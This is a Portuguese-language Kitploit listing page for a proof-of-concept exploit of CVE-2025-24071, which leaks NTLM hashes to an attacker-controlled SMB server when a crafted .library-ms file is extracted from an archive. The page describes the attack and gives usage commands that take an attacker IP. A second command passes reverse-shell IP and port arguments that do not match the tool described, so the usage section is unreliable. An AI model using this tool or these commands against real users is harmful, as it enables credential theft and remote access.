Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24071 — Exploit de prova de conceito para CVE-2025-24071 (vazamento de hash NTLM via extração de arquivo .library-ms de arquivos RAR/ZIP). Dispara autenticação SMB na extração, revelando hashes NTLM para servidor controlado pelo atacante. | Kitploit
Ferramentas/GitHubGitHub/royall-researchers/cve-2025-24071
ReconhecimentoAtaques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de Informações
GitHubroyall-researchers/cve-2025-24071

CVE-2025-24071

Exploit de prova de conceito para CVE-2025-24071 (vazamento de hash NTLM via extração de arquivo .library-ms de arquivos RAR/ZIP). Dispara autenticação SMB na extração, revelando hashes NTLM para servidor controlado pelo atacante.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 anoAinda não revisado

CVE-2025-24071_PoC

CVE-2025-24071: Vazamento de Hash NTLM via Extração de RAR/ZIP e Arquivo .library-ms

O Windows Explorer inicia automaticamente uma solicitação de autenticação SMB quando um arquivo .library-ms é extraído de um arquivo .rar, resultando na divulgação do hash NTLM. O usuário não precisa abrir ou executar o arquivo — apenas extraí-lo é suficiente para acionar o vazamento.

uso

root@kitploit:~

>>python poc.py

>>enter file name: your file name

>>enter IP: attacker IP
root@kitploit:~
>>python3 poc.py --url http://domainname.com --user admin --password password --reverse-ip 10.10.10.10 --reverse-port 8888

atualização:

Atualização: A Microsoft alterou seu número de CVE. O número de CVE anteriormente definido pela Microsoft, CVE-2025-24071, foi atualizado para CVE-2025-24054.🤷‍♂

Baixar ferramenta